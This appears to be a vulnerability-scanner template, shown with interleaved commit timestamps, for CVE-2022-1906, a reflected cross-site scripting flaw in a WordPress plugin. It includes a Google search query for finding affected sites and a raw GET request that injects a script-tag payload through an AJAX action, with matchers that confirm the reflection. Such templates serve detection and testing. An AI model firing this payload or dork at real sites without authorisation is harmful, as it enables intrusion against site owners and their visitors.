2022-08-03 04:05:41 +00:00
id : CVE-2022-1906
info :
2022-09-16 19:50:10 +00:00
name : WordPress Copyright Proof <=4.16 - Cross-Site-Scripting
2022-08-03 04:05:41 +00:00
author : random-robbie
2022-09-16 20:03:07 +00:00
severity : medium
2022-08-03 04:05:41 +00:00
description : |
2022-09-16 19:50:10 +00:00
WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled.
2022-08-03 04:05:41 +00:00
reference :
2022-08-03 13:18:58 +00:00
- https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338
2022-08-03 04:05:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1906
2022-08-05 14:08:51 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-1906
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-08-03 04:05:41 +00:00
metadata :
2022-09-08 22:39:14 +00:00
google-query : inurl:/wp-content/plugins/digiproveblog
2022-08-05 14:08:51 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022
2022-08-03 04:05:41 +00:00
requests :
- raw :
- |
GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body
words :
- "got message <script>alert(document.domain)</script>"
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14